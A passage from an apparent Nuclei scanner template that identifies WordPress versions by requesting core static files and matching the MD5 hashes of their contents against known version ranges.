"(\"fa1da7e900dbf5d150ddf026932c8cea\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"16321544efb636c26f9578140bbebb33\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"eaaffde6b37f2fb30f3b145f5f57456d\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"7ec70092bf4310607125f6817678fd81\" == md5(body))" - - type: dsl - name: 2.8.1 - 2.8.6 - dsl: - - "(\"886e4191f990f81168d9d9e7c842ca6a\" == md5(body))" - - type: dsl - name: 2.8 - dsl: - - "(\"b4c57417333b659979469a7c496d5da2\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"1c73f84ad8fd0062cc75aab6c925d8c2\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"73b84824902a6efc5d892277c4dba147\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"d14c437109488e390fc93c58296bfe6a\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"89a31ff1d9f17d001504866e9a20eebd\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"300482d04f7035050c8221a2388fa20b\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"a082154a8dde56295f325f37ccea73b9\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"5960f69e0ed72d7a00e9bceaa55c9901\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/plugin.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"783d7663a8f6d63af0f1502d604e0883\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"273623256ba39ea22d7706e94fa7a706\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"8f78f0b82394df926411c9792070e6b8\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"2790a6d6a5f4ea3a417ba3223c8992e0\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"381abc41a9cbc190de2ef74a2e393b06\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"e406fa32c549ac964de8735631008aeb\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"9749243b24b6b8a96b3661f6af94577d\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"71b5cb01bf11fbaea25876fb7226d560\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"96949ed7e435e3134e76a76c6c3a80d7\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"a91497ffc613caca5993b2f26d57fd95\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"f42ee6c5e96683c1aabf77c479a07457\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"d36964cc0fb79c59bfbbcdab333155cb\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"d71af8e409639e4fe29a82b2583e97ee\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"74bbd59ce4185f4b61f493f25badfb85\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"eee93d5b9b96842ce7aa67ba2c1c1acd\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"02f855357080d85d6d2f74e1358f198f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"928b4ce8221ec290c1b8f8cf863783a1\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"dd6a35718c9902530d588cdaee69e8ea\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/plugin.js" - matchers: - - type: dsl - name: 4.8.2 - 4.9.1 - dsl: - - "(\"09a85c3689413e0ae8c2c36c71cb18b8\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"2db90f4a6e2b24a6ce1dc7cf5a4e665d\" == md5(body))" - - type: dsl - name: 4.7.6 - 4.7.19 - dsl: - - "(\"006614e9b8bc45c0c876a438ba68924b\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.5 - dsl: - - "(\"5bd6d9dcdfa64309a4f474e3c103c87d\" == md5(body))" - - type: dsl - name: 4.6.7 - 4.6.20 - dsl: - - "(\"da6af7852e021c05095cfba81d84c3df\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.6 - dsl: - - "(\"ec62f800c56ed23f98f1fce2f3d72e00\" == md5(body))" - - type: dsl - name: 4.5.3 - 4.5.9 - dsl: - - "(\"3a3f7240ce8e984494c7f0038465b840\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.2 - dsl: - - "(\"c45c771577fb74eb5ee89ccfa8568554\" == md5(body))" - - type: dsl - name: 4.5.10 - 4.5.23 - dsl: - - "(\"ea8c761e49d51c34f97a568827466f50\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"809bc21a5b35c1e60d107c830bff9474\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.10 - dsl: - - "(\"dc7c82e98849fd4bfac3646dd2adb837\" == md5(body))" - - type: dsl - name: 4.4.11 - 4.4.24 - dsl: - - "(\"b2caced58fa8561c815adf6ec2de1093\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.11 - dsl: - - "(\"1cfe476c543e87f1bf2ad3ac091dc920\" == md5(body))" - - type: dsl - name: 4.3.12 - 4.3.25 - dsl: - - "(\"03d191b53b73ee6f989291dfa7a97050\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"4e3f972530a74ecdd1cb522418db3cb3\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"9bd4ce60a27b57efbabe5569270c770b\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"bd119f2c6e5eaca98303aedbd95d067f\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"c72fe4f61b17d1730183c6c5d3086faa\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"60cff85a34f1cf5ad273abe018e82252\" == md5(body))" - - type: dsl - name: 4.9.2 - 4.9.7 - dsl: - - "(\"13a70cb0ee2bc1c745056c543f394b54\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"5691e4edf58967ac68ef2a739339159d\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"a057a76f743909bce2a9e2f43b888e22\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"f7ac80df36bf6cb0554f61441bf6519d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/link.js" - matchers: - - type: dsl - name: 3.8 - 5.0.11 - dsl: - - "(\"1c8675dcd035cfb374f67bfcbf117a8c\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"2ec8b32828bdd9f0d9efeff41bfe801e\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"573fdbc34e8d60090cd5f5290a677078\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"03ef1e8b6d8670cd60cae80839934c69\" == md5(body))" - - type: dsl - name: 3.2 - 3.4.1 - dsl: - - "(\"4bd8e57afec65d9648c6f3c2e9a9d3ab\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"5e28120ca92eab35105b7e939fca9330\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"c4a2322a9fd0b704a2c78e090d402011\" == md5(body))" - - type: dsl - name: 2.7.1 - dsl: - - "(\"c6f9330320b00237858bc6422a49aaf8\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"3c05b86e8eff05cd86141aeab299d69f\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"78783e24b2fd8857004c9c7a179896be\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"6adead36e8e401d6a079f15a564a1b09\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"2e6be97ee352add00ecf8f7d20174fc8\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"385f34c03f7abf693be8551979ea9106\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.css" - matchers: - - type: dsl - name: 4.3 - 5.1.8 - dsl: - - "(\"74f9dcf5ab8c92f6666ff52c699873c8\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"7fbe22c3651b774033fa758ca07ccbbb\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"a3107b7ddafb2dad47ab68d596d8617d\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"f614179d0c40cd3dea9a0b89426e70a5\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"0e672b35b6bfab72babe50424503466b\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"95137319acf4e217d0b193768155c9fa\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"01cdaa40c5e6b03518b159adae2b0673\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"9a40299c0045e97780fd87af6c04ea77\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"343d63dd14ec979667d9d3a6210be95f\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"ae35b8b7fd84acc65690a0d13162d3b4\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"07ed58a67ed2becdbbe3657fb4da3e8e\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"2551f4595882e172dc1e6b68e8c64806\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"648f59aac0ad841a4035dc163482de5f\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"187909d84505ce345a885d0312d35081\" == md5(body))" - - type: dsl - name: 5.2 - 5.3.6 - dsl: - - "(\"4a89411639f686bd178d00573aa9dec1\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"2c2a69b51793d0f2865b705d1eaaa53c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/editor_plugin.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"21570aa6de2c615eff4eb63f2b7a6a65\" == md5(body))" - - type: dsl - name: 3.6.1 - 3.7.33 - dsl: - - "(\"a3d703f0f3b6c2171edea4410ec478b5\" == md5(body))" - - type: dsl - name: 3.6 - dsl: - - "(\"d3565905a56a8dc9268f4e2d225d8e0e\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"463fd700afb5ed294264bc16a1063375\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a19969fc41d6dbc9db112398530434ec\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a8074d90ba5bf9623345922540800eab\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"29b89850aaa6f77a7b49c2e6beb9921c\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"a27f49833d720b5bc9b288a32b776831\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"d131fd47305e4d0b31657b7df4163ac7\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"dd5628adfb50edf54fe9f81e2eb9d210\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"aabd9ea9037c5fe2bb6b2007ffc196f5\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"efdcaea17aeae5a67ccd1a770d38bee0\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"14dc2e370b485d43d4c0d28ba8883b92\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"87ade361a474d9b789bd894a25b7f085\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"8caa3a7ba57a57088a1ac11cff852966\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"75d0cf576de67064ef6a66f911d3be48\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"e3bf9cd74aa73cd3383e6968a464ba28\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"4412e7acac7f4231b6c07e3a4691ebd7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"72c2441d86edf9ef1ef8fea945281db6\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.19 - dsl: - - "(\"64cfe6d2916c9b29264414a55f79e038\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"e21167e2200cac86643cae38c67ace04\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"10b6fef22a3928c4b9354e7b8c38153d\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6773da476c35af85238724bb65230f7d\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.4.24 - dsl: - - "(\"b0b1e190c6972559e63acd0e4648bb87\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.2 - dsl: - - "(\"35c458d7e445b782015238656aa086ea\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"5593b5d1caa7c5902164ddd5392bff25\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"3bb1a6dc71edb4b953c6dec624b162c5\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"c93e26230e05d4fdd87288b47c60873f\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"8111a8d605183b921cb237a1406afcd9\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"f4ca844f37f29e43b4386ce18a0c5f43\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.33 - dsl: - - "(\"03ad629cdfa5ab6ae56233ebbcb73262\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"10e74c33a682b849626d06d7c826e8e6\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"45687c2857346504c9f1a30b53aac86f\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"a3699ee99e297be60886c6eda6ac825b\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"0192b04cf4169292d94cbf62519ab6ff\" == md5(body))" - - type: dsl - name: 4.9 - dsl: - - "(\"cb53c25524a16659fc1f961d507ba8bb\" == md5(body))" - - type: dsl - name: 4.9.1 - 5.0.11 - dsl: - - "(\"88f98b449b8aa12942cafd783b5aa7b5\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"875f1fdfc58ad8f9a9646cea752c5579\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b8f4f7a4ef5b0b9b56265ce6876b20f4\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"0bede42efd65e972891b8a927da5dc38\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"2d1d9fe235c2224f117fe901d73e8b04\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"fae67d9a9f6b3bd48515d77bbf683691\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"e65885685bacc54dd952747d38dda90b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.js" - matchers: - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"cb1aec084f3cd28d6f37990e80174863\" == md5(body))" - - type: dsl - name: 3.7.1 - 3.7.33 - dsl: - - "(\"02ed0a4f130b11ee395676d0e26171b8\" == md5(body))" - - type: dsl - name: 3.7 - dsl: - - "(\"4eb9923fe07a29b24bac1e21aaa7e6eb\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"5f51f325fb3e0b8e1737690dc96e3c9d\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"8b4d90c058f4f224c9c8f304d67e2dd5\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"186e45b7613323108c761faee2a1cae1\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"2be4c574071c7a785fbad50515738c77\" == md5(body))" - - type: dsl - name: 3.1 - 3.2.1 - dsl: - - "(\"40e9c12914d1afb3978286bb1140b352\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"663feb32930d3bb5cb2a438f144f9d43\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"c4c59bfbf6ac1101ee884761914d76da\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"19af2018dbb26944de552ba2df25a95c\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"3e07acce83c1bd7620680fcab0791113\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"5b140ddf0f08034402ae78b31d8a1a28\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"7b6858348aad603f95e0fde09e596870\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"27c9ee4fe976a84c4b3aa008d0a1b7fa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/editor-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"730da0a3e31cb3fd7069af78e90c150f\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.1.8 - dsl: - - "(\"5e813d95a85d8ea28d0a49ee1d043803\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.1 - dsl: - - "(\"3fecc79e35495fcc9f8d89be8954afb8\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"689196d0bcdd6e580c39598b12c05943\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"bb0732eaf965130ece1b24ae7235da85\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"ae304f46f8a7284bb4da356459d1d37b\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"baf5f28f8fd531b7dc647b139e7bad19\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"f5d55bb847148c9c3bd11ad00242894f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"f179d2f7d136440ad6c66b3cc7a3fd7e\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"f861771d6113ddf00850eb59002f3452\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"37afbe482f103bf4838086dc55eb2abc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/editor.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"d12050e44bb9f6359fa229f7f9d51d61\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.1.8 - dsl: - - "(\"25209d7f4c896e298c193b79ec105d5d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.1 - dsl: - - "(\"6807a1a2e5f6166d6387cb8e2e1a3201\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"73de2615baf27a16dd6e1894df887af8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"312bb2063162d37cc378b77f4894d54c\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"4b332eb4c9bbb5e89846330610c93727\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"431943477c661180307f94c241d650c6\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"43a4d5462bfb7fb1f6cba63b25fdcb1b\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"fd68444066ed563f5ea531059d251e47\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"74b1f2dbd97fbc039cf46c3d98921eed\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9e18da2c075eefe3711b16e2ca57e3fc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/dashboard.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"bee78ff276813ea4085614e738879030\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"0dc133e28d19ed6ae18702a58a335180\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"b900262c0a2aca5776dcfc19e2bec4b9\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.3.25 - dsl: - - "(\"92f93e7b1f8859c86d8577635adcd863\" == md5(body))" - - type: dsl - name: 4.0 - 4.2.2 - dsl: - - "(\"39f67345a12faf1a3c53c9289fc59f86\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"c77078371b618b99aa2bdeb82eb81473\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"3c89fd0ed1e0d37bde6d6722b815d02b\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"b7f0a17a87fc20fe83d0a7b3d97b97b0\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"d14c932322f06c464282544b020ab812\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"5fccc4199d79f8f028ff215d5f65d1ed\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"cdc52185bc346b9a55af6d5015d763cb\" == md5(body))" - - type: dsl - name: 4.9.8 - 4.9.9 - dsl: - - "(\"4641de29ebacfc526e739b33afbd0800\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"3980aff112fb8222c364fbe4f7b88f58\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d1d46d0ff1a26493c5cebd586579ab02\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8b132ecee16938da9dd85c583d4681d9\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.1 - dsl: - - "(\"107d1144ac8c4b18346708704079b021\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"410cc788033c756935db30c728b1f63f\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"e040d11f39d268dff69edecf091f6e87\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"edea8c5146c4d778fc3a9e6f4377de4a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"bfbe016b6f0d5f009a81b38f53e4bd4d\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"1fdf9fead757cda46f53f3b79b55fe47\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"9b64d09bbbe5b190fcd535d858fb353f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6c3ea4737ae1a0f88a18b95fcd798581\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"b0300165ad6c1ea5b03a6dd265636213\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"334de15df8332ef1cbebbcdc105c9a90\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"97d6a50c5da4c75f433f9ed02b5de62e\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"2b0b4e8d23d211fac38428825e524d6a\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a4f5972d11d6f587d7d01372932e97ed\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"e3a87490287abc38b9801a5ab853dda9\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"10d828db9d6ba8cbd2c2567664dccd7f\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"8917960dfdd03a01d3c003f403eea83f\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"9dc196c29bce46911bb3f42c86e90586\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"51348baf610df3378679eab862ad5e55\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"7c80f6ab4c6fd0d3f4c5391a2e635780\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"7d53a09553401449f43c81877b556cad\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"a1200190c327704e2e289f9832fab738\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"9671059ae329ffb11662d51f5d1870a2\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"64206aaba162a411b337d64de20ecfea\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4650c4873e09cc55426cbe18ada6723e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6d6b42368f42527ceae8621ec731bd28\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/admin-bar.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"57c6a9490f4fcbed5358c061c1549043\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"181a0de4f1c4252aebb47f2204f0c119\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"3a4f06342b20831610cd2389936d60cb\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"a7ab21eae335ce585704016628603831\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"2335c2d22bc85f12e4ca34d5993e026a\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"4eeb8803dcb88361aeceeeb6339a3a51\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"acb2a06d6bb17892486bb83171ab57e0\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"8a3c425cdc87706f0e2f30643e278348\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"197404b329a50b23b37b0fbd72b81017\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"d6b102488933f7cd50d8b1b17627733e\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"d87d776863fd4e2833fd40388559908b\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"ea21d81ce5d4c547a1c13476f1274ffb\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"b13c1e5aa68a4038c1bc0582fc04d295\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"c6eafec474a03263c37fa159dd794525\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"4fa7b6674dee1a9dd01fa7474baf3096\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"ed0357294791d25a02ddf53eca1c55da\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"3b3696d5be809c1ae294cd0c1149431d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8a579bbb02688c923f0704ae98fcc87d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"34c98fdd54bd1ebe81fadf94002cf606\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"b34e40cefb53403bd9a8c058b7f91dd4\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"990729b33128aba139f4ca6f9c3d26db\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0b54ad0d536080b196cb3e2e1d10691b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a9b79d9be177c2ac33595ba769fcd246\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/wp-tinymce.js" - matchers: - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"1a71eb9c2e788d1520b086939b14fdeb\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"9d2c582fe6cb12203ad0b857a029bd33\" == md5(body))" - - type: dsl 